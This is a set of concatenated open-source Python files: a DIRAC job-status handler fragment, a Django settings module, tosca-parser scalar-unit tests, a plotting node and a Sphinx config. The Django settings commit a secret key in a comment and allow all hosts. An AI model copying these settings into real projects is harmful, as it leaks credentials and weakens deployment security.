status = 'Running'
# Get the latest WN time stamps of status updates
result = logDB.getWMSTimeStamps(int(jobID))
if not result['OK']:
return result
lastTime = max([float(t) for s, t in result['Value'].items() if s != 'LastTime'])
lastTime = Time.toString(Time.fromEpoch(lastTime))
# Get the last status values
dates = sorted(statusDict)
# We should only update the status if its time stamp is more recent than the last update
for date in [date for date in dates if date >= lastTime]:
sDict = statusDict[date]
if sDict['Status']:
status = sDict['Status']
if status in JOB_FINAL_STATES:
endDate = date
if status == "Running":
startFlag = 'Running'
if sDict['MinorStatus']:
minor = sDict['MinorStatus']
if minor == "Application" and startFlag == 'Running':
startDate = date
if sDict['ApplicationStatus']:
application = sDict['ApplicationStatus']
counter = sDict.get('ApplicationCounter')
if counter:
appCounter = counter
attrNames = []
attrValues = []
if status:
attrNames.append('Status')
attrValues.append(status)
if minor:
attrNames.append('MinorStatus')
attrValues.append(minor)
if application:
attrNames.append('ApplicationStatus')
attrValues.append(application)
if appCounter:
attrNames.append('ApplicationCounter')
attrValues.append(appCounter)
result = jobDB.setJobAttributes(jobID, attrNames, attrValues, update=True)
if not result['OK']:
return result
if endDate:
result = jobDB.setEndExecTime(jobID, endDate)
if startDate:
result = jobDB.setStartExecTime(jobID, startDate)
# Update the JobLoggingDB records
for date in dates:
sDict = statusDict[date]
status = sDict['Status']
if not status:
status = 'idem'
minor = sDict['MinorStatus']
if not minor:
minor = 'idem'
application = sDict['ApplicationStatus']
if not application:
application = 'idem'
source = sDict['Source']
result = logDB.addLoggingRecord(jobID, status, minor, application, date, source)
if not result['OK']:
return result
return S_OK()
###########################################################################
types_setJobSite = [[six.string_types, int], six.string_types]
def export_setJobSite(self, jobID, site):
"""Allows the site attribute to be set for a job specified by its jobID.
"""
result = jobDB.setJobAttribute(int(jobID), 'Site', site)
return result
###########################################################################
types_setJobFlag = [[six.string_types, int], six.string_types]
def export_setJobFlag(self, jobID, flag):
""" Set job flag for job with jobID
"""
result = jobDB.setJobAttribute(int(jobID), flag, 'True')
return result
###########################################################################
types_unsetJobFlag = [[six.string_types, int], six.string_types]
def export_unsetJobFlag(self, jobID, flag):
""" Unset job flag for job with jobID
"""
result = jobDB.setJobAttribute(int(jobID), flag, 'False')
return result
###########################################################################
types_setJobApplicationStatus = [[six.string_types, int], six.string_types, six.string_types]
def export_setJobApplicationStatus(self, jobID, appStatus, source='Unknown'):
""" Set the application status for job specified by its JobId.
"""
result = jobDB.getJobAttributes(int(jobID), ['Status', 'MinorStatus'])
if not result['OK']:
return result
if not result['Value']:
# if there is no matching Job it returns an empty dictionary
return S_ERROR('No Matching Job')
status = result['Value']['Status']
if status == "Stalled" or status == "Matched":
newStatus = 'Running'
else:
newStatus = status
minorStatus = result['Value']['MinorStatus']
result = jobDB.setJobStatus(int(jobID), status=newStatus, minor=minorStatus, application=appStatus)
if not result['OK']:
return result
result = logDB.addLoggingRecord(int(jobID), newStatus, minorStatus, appStatus, source=source)
return result
###########################################################################
types_setJobParameter = [[six.string_types, int], six.string_types, six.string_types]
def export_setJobParameter(self, jobID, name, value):
""" Set arbitrary parameter specified by name/value pair
for job specified by its JobId
"""
if elasticJobDB:
return elasticJobDB.setJobParameter(int(jobID), name, value)
return jobDB.setJobParameter(int(jobID), name, value)
###########################################################################
types_setJobsParameter = [dict]
def export_setJobsParameter(self, jobsParameterDict):
""" Set arbitrary parameter specified by name/value pair
for job specified by its JobId
"""
for jobID in jobsParameterDict:
if elasticJobDB:
res = elasticJobDB.setJobParameter(jobID,
str(jobsParameterDict[jobID][0]),
str(jobsParameterDict[jobID][1]))
if not res['OK']:
self.log.error('Failed to add Job Parameter to elasticJobDB', res['Message'])
else:
res = jobDB.setJobParameter(jobID,
str(jobsParameterDict[jobID][0]),
str(jobsParameterDict[jobID][1]))
if not res['OK']:
self.log.error('Failed to add Job Parameter to MySQL', res['Message'])
return S_OK()
###########################################################################
types_setJobParameters = [[six.string_types, int], list]
def export_setJobParameters(self, jobID, parameters):
""" Set arbitrary parameters specified by a list of name/value pairs
for job specified by its JobId
"""
result = jobDB.setJobParameters(int(jobID), parameters)
if not result['OK']:
return S_ERROR('Failed to store some of the parameters')
return S_OK('All parameters stored for job')
###########################################################################
types_sendHeartBeat = [[six.string_types, int], dict, dict]
def export_sendHeartBeat(self, jobID, dynamicData, staticData):
""" Send a heart beat sign of life for a job jobID
"""
result = jobDB.setHeartBeatData(int(jobID), staticData, dynamicData)
if not result['OK']:
self.log.warn('Failed to set the heart beat data', 'for job %d ' % int(jobID))
# Restore the Running status if necessary
result = jobDB.getJobAttributes(jobID, ['Status'])
if not result['OK']:
return result
if not result['Value']:
return S_ERROR('Job %d not found' % jobID)
status = result['Value']['Status']
if status == "Stalled" or status == "Matched":
result = jobDB.setJobAttribute(jobID, 'Status', 'Running', True)
if not result['OK']:
self.log.warn('Failed to restore the job status to Running')
jobMessageDict = {}
result = jobDB.getJobCommand(int(jobID))
if result['OK']:
jobMessageDict = result['Value']
if jobMessageDict:
for key, _value in jobMessageDict.items():
result = jobDB.setJobCommandStatus(int(jobID), key, 'Sent')
return S_OK(jobMessageDict)
| gpl-3.0 | -2,354,184,175,611,544,600 | 33.194373 | 113 | 0.614211 | false |
mcallaghan/tmv | BasicBrowser/BasicBrowser/settings.py | 1 | 4724 | """
Django settings for BasicBrowser project.
Generated by 'django-admin startproject' using Django 1.10.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# SECURITY WARNING: keep the secret key used in production secret!
#SECRET_KEY = '@-*jt+re$+w6i1nd53x&p5e&#@rv##*yv_fkebk_1%0z!=#3q4'
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: don't run with debug turned on in production!
MAINTENANCE = False
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'scoping.apps.ScopingConfig',
'tmv_app.apps.TmvAppConfig',
'dal',
'dal_select2',
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.postgres',
'django.contrib.gis',
'django_extensions',
'psqlextra',
'rest_framework',
'debug_toolbar',
'cities',
'twitter',
'parliament',
'django_tables2',
'lotto',
'django_filters',
'bootstrap4',
'crispy_forms',
]
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 50,
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_FILTER_BACKENDS': ('django_filters.rest_framework.DjangoFilterBackend',)
}
MIDDLEWARE = [
#'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
#'django.middleware.cache.FetchFromCacheMiddleware',
]
ROOT_URLCONF = 'BasicBrowser.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'BasicBrowser/templates/BasicBrowser')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request',
],
},
},
]
WSGI_APPLICATION = 'BasicBrowser.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = '/var/www/tmv/BasicBrowser/static/'
#MEDIA_URL = '/pdfs/'
#MEDIA_ROOT = '/queries/pdfs/' #os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_ROOT = '/var/www/tmv/BasicBrowser/media'
QUERY_DIR = '/usr/local/apsis/queries/'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': '/var/tmp/django_cache',
'TIMEOUT': 60,
'OPTIONS': {
'MAX_ENTRIES': 1000
}
}
}
## CELERY SETTINGS
BROKER_URL = 'redis://localhost:6379/0'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
from .settings_local import *
| gpl-3.0 | -1,989,559,241,619,876,600 | 25.244444 | 91 | 0.678662 | false |
spzala/tosca-parser | parser/tests/test_scalarunit.py | 1 | 12137 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from parser.common import exception
from parser.elements.types.scalarunit import ScalarUnit_Frequency
from parser.elements.types.scalarunit import ScalarUnit_Size
from parser.elements.types.scalarunit import ScalarUnit_Time
from parser.elements.templates.nodetemplate import NodeTemplate
from parser.tests.base import TestCase
from parser.utils import yamlparser
class ScalarUnitPositiveTest(TestCase):
scenarios = [
(
# tpl_snippet with mem_size given as number+space+MB
'mem_size_is_number_Space_MB',
dict(tpl_snippet='''
server:
type: tosca.nodes.Compute
capabilities:
host:
properties:
mem_size: 1024 MB
''',
property='mem_size',
expected='1024 MB')
),
(
# tpl_snippet with mem_size given as number+spaces+GB
'mem_size_is_number_Space_GB',
dict(tpl_snippet='''
server:
type: tosca.nodes.Compute
capabilities:
host:
properties:
mem_size: 1 GB
''',
property='mem_size',
expected='1 GB')
),
(
# tpl_snippet with mem_size given as number+tiB
'mem_size_is_number_NoSpace_GB',
dict(tpl_snippet='''
server:
type: tosca.nodes.Compute
capabilities:
host:
properties:
mem_size: 1tiB
''',
property='mem_size',
expected='1tiB')
),
(
# tpl_snippet with mem_size given as number+Spaces+GIB
'mem_size_is_number_Spaces_GB',
dict(tpl_snippet='''
server:
type: tosca.nodes.Compute
capabilities:
host:
properties:
mem_size: 1 GIB
''',
property='mem_size',
expected='1 GIB')
),
(
# tpl_snippet with mem_size given as number+Space+tib
'mem_size_is_number_Spaces_GB',
dict(tpl_snippet='''
server:
type: tosca.nodes.Compute
capabilities:
host:
properties:
mem_size: 1 tib
''',
property='mem_size',
expected='1 tib')
),
(
'cpu_frequency_is_float_Space_GHz',
dict(tpl_snippet='''
server:
type: tosca.nodes.Compute
capabilities:
host:
properties:
cpu_frequency: 2.5 GHz
''',
property='cpu_frequency',
expected='2.5 GHz')
),
(
'cpu_frequency_is_float_Space_MHz',
dict(tpl_snippet='''
server:
type: tosca.nodes.Compute
capabilities:
host:
properties:
cpu_frequency: 800 MHz
''',
property='cpu_frequency',
expected='800 MHz')
),
]
def test_scenario_scalar_unit_positive(self):
tpl = self.tpl_snippet
nodetemplates = yamlparser.simple_parse(tpl)
nodetemplate = NodeTemplate('server', nodetemplates)
props = nodetemplate.get_capability('host').get_properties()
prop_name = self.property
if props and prop_name in props.keys():
prop = props[prop_name]
self.assertIsNone(prop.validate())
resolved = prop.value
self.assertEqual(resolved, self.expected)
class GetNumFromScalarUnitSizePositive(TestCase):
scenarios = [
( # Note that (1 TB) / (1 GB) = 1000
'Input is TB, user input is GB',
dict(InputMemSize='1 TB',
UserInputUnit='gB',
expected=1000)
),
( # Note that (1 Tib)/ (1 GB) = 1099
'Input is TiB, user input is GB',
dict(InputMemSize='1 TiB',
UserInputUnit='gB',
expected=1099.511627776)
),
]
def test_scenario_get_num_from_scalar_unit_size(self):
resolved = (ScalarUnit_Size(self.InputMemSize).
get_num_from_scalar_unit(self.UserInputUnit))
self.assertEqual(resolved, self.expected)
class GetNumFromScalarUnitFrequencyPositive(TestCase):
scenarios = [
( # Note that (1 GHz) / (1 Hz) = 1000000000
'Input is GHz, user input is Hz',
dict(InputMemSize='1 GHz',
UserInputUnit='Hz',
expected=1000000000)
),
(
'Input is GHz, user input is Hz',
dict(InputMemSize='2.4 GHz',
UserInputUnit='Hz',
expected=2400000000)
),
( # Note that (1 GHz)/ (1 MHz) = 1000
'Input is MHz, user input is GHz',
dict(InputMemSize='800 MHz',
UserInputUnit='GHz',
expected=0.8)
),
(
'Input is GHz, user input is Hz',
dict(InputMemSize='0.9 GHz',
UserInputUnit='MHz',
expected=900)
),
(
'Input is GHz, user input is Hz',
dict(InputMemSize='2.7GHz',
UserInputUnit='MHz',
expected=2700)
),
]
def test_scenario_get_num_from_scalar_unit_frequency(self):
resolved = (ScalarUnit_Frequency(self.InputMemSize).
get_num_from_scalar_unit(self.UserInputUnit))
self.assertEqual(resolved, self.expected)
class GetNumFromScalarUnitTimePositive(TestCase):
scenarios = [
( # Note that (1 s) / (1 ms) = 1000
'Input is 500ms, user input is s',
dict(InputMemSize='500 ms',
UserInputUnit='s',
expected=0.5)
),
( # Note that (1 h)/ (1 s) = 3600
'Input is h, user input is s',
dict(InputMemSize='1 h',
UserInputUnit='s',
expected=3600)
),
( # Note that (1 m)/ (1 s) = 60
'Input is m, user input is s',
dict(InputMemSize='0.5 m',
UserInputUnit='s',
expected=30)
),
( # Note that (1 d)/ (1 h) = 24
'Input is d, user input is h',
dict(InputMemSize='1 d',
UserInputUnit='h',
expected=24)
),
]
def test_scenario_get_num_from_scalar_unit_time(self):
resolved = (ScalarUnit_Time(self.InputMemSize).
get_num_from_scalar_unit(self.UserInputUnit))
self.assertEqual(resolved, self.expected)
class GetNumFromScalarUnitSizeNegative(TestCase):
InputMemSize = '1 GB'
UserInputUnit = 'qB'
def test_get_num_from_scalar_unit_size_negative(self):
try:
(ScalarUnit_Size(self.InputMemSize).
get_num_from_scalar_unit(self.UserInputUnit))
except Exception as error:
self.assertTrue(isinstance(error, ValueError))
self.assertEqual('input unit "qB" is not a valid unit',
error.__str__())
class GetNumFromScalarUnitFrequencyNegative(TestCase):
InputFrequency = '2.7 GHz'
UserInputUnit = 'Jz'
def test_get_num_from_scalar_unit_frequency_negative(self):
try:
(ScalarUnit_Frequency(self.InputFrequency).
get_num_from_scalar_unit(self.UserInputUnit))
except Exception as error:
self.assertTrue(isinstance(error, ValueError))
self.assertEqual('input unit "Jz" is not a valid unit',
error.__str__())
class GetNumFromScalarUnitTimeNegative(TestCase):
InputTime = '5 ms'
UserInputUnit = 'D'
def test_get_num_from_scalar_unit_frequency_negative(self):
try:
(ScalarUnit_Time(self.InputTime).
get_num_from_scalar_unit(self.UserInputUnit))
except Exception as error:
self.assertTrue(isinstance(error, ValueError))
self.assertEqual('input unit "Jz" is not a valid unit',
error.__str__())
class ScalarUnitNegativeTest(TestCase):
custom_def_snippet = '''
tosca.my.nodes.Compute:
derived_from: tosca.nodes.Root
properties:
cpu_frequency:
required: no
type: scalar-unit.frequency
constraints:
- greater_or_equal: 0.1 GHz
disk_size:
required: no
type: scalar-unit.size
constraints:
- greater_or_equal: 1 GB
mem_size:
required: no
type: scalar-unit.size
constraints:
- in_range: [1 MiB, 1 GiB]
'''
custom_def = yamlparser.simple_parse(custom_def_snippet)
# disk_size doesn't provide a value, mem_size uses an invalid unit.
def test_invalid_scalar_unit(self):
tpl_snippet = '''
server:
type: tosca.my.nodes.Compute
properties:
cpu_frequency: 50.3.6 GHZ
disk_size: MB
mem_size: 1 QB
'''
nodetemplates = yamlparser.simple_parse(tpl_snippet)
nodetemplate = NodeTemplate('server', nodetemplates, self.custom_def)
for p in nodetemplate.get_properties_objects():
self.assertRaises(ValueError, p.validate)
# disk_size is less than 1 GB, mem_size is not in the required range.
# Note: in the spec, the minimum value of mem_size is 1 MiB (> 1 MB)
def test_constraint_for_scalar_unit(self):
tpl_snippet = '''
server:
type: tosca.my.nodes.Compute
properties:
cpu_frequency: 0.05 GHz
disk_size: 500 MB
mem_size: 1 MB
'''
nodetemplates = yamlparser.simple_parse(tpl_snippet)
nodetemplate = NodeTemplate('server', nodetemplates, self.custom_def)
props = nodetemplate.get_properties()
if 'cpu_frequency' in props.keys():
error = self.assertRaises(exception.ValidationError,
props['cpu_frequency'].validate)
self.assertEqual('cpu_frequency: 0.05 GHz must be greater or '
'equal to "0.1 GHz".', error.__str__())
if 'disk_size' in props.keys():
error = self.assertRaises(exception.ValidationError,
props['disk_size'].validate)
self.assertEqual('disk_size: 500 MB must be greater or '
'equal to "1 GB".', error.__str__())
if 'mem_size' in props.keys():
error = self.assertRaises(exception.ValidationError,
props['mem_size'].validate)
self.assertEqual('mem_size: 1 MB is out of range '
'(min:1 MiB, '
'max:1 GiB).', error.__str__())
| apache-2.0 | -1,158,263,557,762,250,000 | 33.776504 | 78 | 0.510917 | false |
cdd1969/pygwa | lib/flowchart/nodes/n14_overheadplot/node_plot_overheadvsriverwl.py | 1 | 7043 | #!/usr/bin python
# -*- coding: utf-8 -*-
from pyqtgraph.Qt import QtCore
from pyqtgraph import BusyCursor
from lib.functions import plot_pandas
from lib.functions.general import getCallableArgumentList, isNumpyNumeric
from lib.flowchart.nodes.generalNode import NodeWithCtrlWidget, NodeCtrlWidget
class plotGWLvsWLNode(NodeWithCtrlWidget):
"""Plot Growundwater-level VS River water-level (matplotlib) or so-called overhead"""
nodeName = "Plot Overhead"
uiTemplate = [
{'title': 'X: River WL', 'name': 'x', 'type': 'list', 'value': None, 'default': None, 'values': [None], 'tip': 'Name of the column with river waterlevel data.\nWill be plotted on X-axis'},
{'title': 'Y: Well GWL', 'name': 'y', 'type': 'list', 'value': None, 'default': None, 'values': [None], 'tip': 'Name of the column with well groundwater-level\ndata. It will be plotted on Y-axis'},
{'name': 'plot overheads', 'type': 'bool', 'value': False, 'default': False, 'tip': 'If checked, will substract X-values from Y-values element-wise (Yvalues-Xvalues) before\nplotting. This means that so called "overheads" will be plotted on Y-axis and not the\nactual groundwater-levels.\nIf not checked - plots real values of Y-column'},
{'title': 'trendline', 'name': 'trendlinemode', 'type': 'list', 'value': 'None', 'default': 'None', 'values': ['Normal', 'Shifted', 'None'], 'tip': 'Normal - draw trendlines using all data points\nShifted - draw trendlines using all data points, and shift them to the most-far-lying point\nNone - do not draw trendline'},
{'name': 'Hydrological Values', 'type': 'bool', 'expanded': False, 'children': [
{'name': 'MHW', 'type': 'float', 'limits': (-25., 25.), 'step': 0.1, 'tip': 'Mean High Water (ger. MThw)'},
{'name': 'MLW', 'type': 'float', 'limits': (-25., 25.), 'step': 0.1, 'tip': 'Mean Low Water (ger. MTnw)'},
{'name': 'MLWS', 'type': 'float', 'limits': (-25., 25.), 'step': 0.1, 'tip': 'Mean Low Water Springs (ger. MSpTnw)'},
{'name': 'LLW', 'type': 'float', 'limits': (-25., 25.), 'step': 0.1, 'tip': 'Lowest Low Water (ger. NNTnw)'},
]},
{'name': 'Plot Parameters', 'type': 'group', 'expanded': False, 'children': [
{'name': 'title', 'type': 'str', 'value': None, 'default': None, 'tip': 'Figure title (default None)'},
{'name': 'title_fontsize', 'type': 'float', 'value': 20., 'default': 20., 'tip': ''},
{'name': 'xlabel', 'type': 'str', 'value': None, 'default': None, 'tip': 'None, or string for labeling x-axes'},
{'name': 'ylabel', 'type': 'str', 'value': None, 'default': None, 'tip': 'None, or string for labeling y-axes'},
{'name': 'axeslabel_fontsize', 'type': 'float', 'value': 10., 'default': 10., 'tip': ''},
{'name': 'legendlabels', 'type': 'str', 'value': [None], 'default': [None], 'tip': 'List of legendnames or [None]. If default ([None]) - standart names are used'},
{'name': 'legend_fontsize', 'type': 'float', 'value': 8., 'default': 8., 'tip': ''},
{'name': 'axesvalues_fontsize', 'type': 'float', 'value': 10., 'default': 10., 'tip': ''},
{'name': 'annotation_fontsize', 'type': 'float', 'value': 10., 'default': 10., 'tip': 'Fontsize of `Hydrological Values`'},
{'name': 'marker', 'type': 'list', 'value': 'o', 'default': 'o', 'values': ['o', '.', 'x', '+', 'h'], 'tip': 'marker style for points'},
{'title': 'marker size', 'name': 's', 'type': 'int', 'value': 10, 'default': 10, 'tip': 'marker point size'},
{'name': 'xlim', 'type': 'str', 'value': None, 'default': None, 'tip': 'None, or list for x-limits [xmin, xmax] of the plot. (i.e. [0., 1.])'},
{'name': 'ylim', 'type': 'str', 'value': None, 'default': None, 'tip': 'None, or list for y-limits [ymin, ymax] of the plot. (i.e. [-0.5, 0.5])'},
]},
{'name': 'Plot', 'type': 'action'},
]
def __init__(self, name, parent=None):
super(plotGWLvsWLNode, self).__init__(name, parent=parent, terminals={'In': {'io': 'in'}}, color=(150, 150, 250, 150))
def _createCtrlWidget(self, **kwargs):
return plotGWLvsWLNodeCtrlWidget(**kwargs)
def process(self, In):
df = In
if df is not None:
# when we recieve a new dataframe into terminal - update possible selection list
if not self._ctrlWidget.plotAllowed():
colname = [col for col in df.columns if isNumpyNumeric(df[col].dtype)]
self._ctrlWidget.param('y').setLimits(colname)
self._ctrlWidget.param('x').setLimits(colname)
if self._ctrlWidget.plotAllowed():
kwargs = self.ctrlWidget().prepareInputArguments()
with BusyCursor():
if self._ctrlWidget.param('plot overheads').value() is True:
y_name = kwargs['y'][0]
x_name = kwargs['x'][0]
overhead_name = y_name+' - '+x_name
df[overhead_name] = df[y_name]-df[x_name]
kwargs['y'] = [overhead_name]
plot_pandas.plot_pandas_scatter_special1(df, **kwargs)
if self._ctrlWidget.param('plot overheads').value() is True:
del df[overhead_name]
class plotGWLvsWLNodeCtrlWidget(NodeCtrlWidget):
def __init__(self, **kwargs):
super(plotGWLvsWLNodeCtrlWidget, self).__init__(update_on_statechange=False, **kwargs)
self._plotAllowed = False
def initUserSignalConnections(self):
self.param('Plot').sigActivated.connect(self.on_plot_clicked)
@QtCore.pyqtSlot()
def on_plot_clicked(self):
self._plotAllowed = True
self._parent.update()
self._plotAllowed = False
def plotAllowed(self):
return self._plotAllowed
def prepareInputArguments(self):
validArgs = getCallableArgumentList(plot_pandas.plot_pandas_scatter_special1, get='args')
validArgs += ['MHW', 'MLW', 'MLWS', 'LLW']
kwargs = dict()
for param in self.params(ignore_groups=True):
if param.name() in validArgs:
kwargs[param.name()] = self.p.evaluateValue(param.value())
if kwargs['xlabel'] in [None, 'None', '']: kwargs['xlabel'] = kwargs['x']
if kwargs['ylabel'] in [None, 'None', '']: kwargs['ylabel'] = kwargs['y']
kwargs['x'] = [kwargs.pop('x')]
kwargs['y'] = [kwargs.pop('y')]
if self.paramValue('Hydrological Values'):
kwargs['HYDR_VALS'] = dict()
for name in ['MHW', 'MLW', 'MLWS', 'LLW']:
if self.paramValue('Hydrological Values'):
kwargs['HYDR_VALS'][name] = kwargs.pop(name)
else:
kwargs.pop(name)
return kwargs
| gpl-2.0 | -1,190,005,362,130,740,700 | 60.780702 | 350 | 0.556297 | false |
openlmi/openlmi-doc | doc/conf.py | 1 | 9713 | # -*- coding: utf-8 -*-
#
# OpenLMI documentation build configuration file, created by
# sphinx-quickstart on Thu Sep 12 11:07:33 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
def setup(app):
app.add_config_value('includeClasses', 'True', True)
# Register new option to include documentation for metacommand's commands
app.add_config_value('with_commands', False, True)
includeClasses = False
with_commands = True
import sys
from mock import Mock as MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return Mock()
MOCK_MODULES = ['pywsman', 'M2Crypto', 'M2Crypto.SSL', 'M2Crypto.SSL.Checker', 'M2Crypto.X509']
sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES)
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('python'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.ifconfig',
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.intersphinx'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'OpenLMI'
copyright = u'OpenLMI authors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'latest'
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "myrtd"
html_theme_path = ["_theme"]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = ['../..']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = False
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'OpenLMI'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'OpenLMI.tex', u'OpenLMI Documentation',
u'OpenLMI authors', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'openlmi', u'OpenLMI Documentation',
[u'OpenLMI authors'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
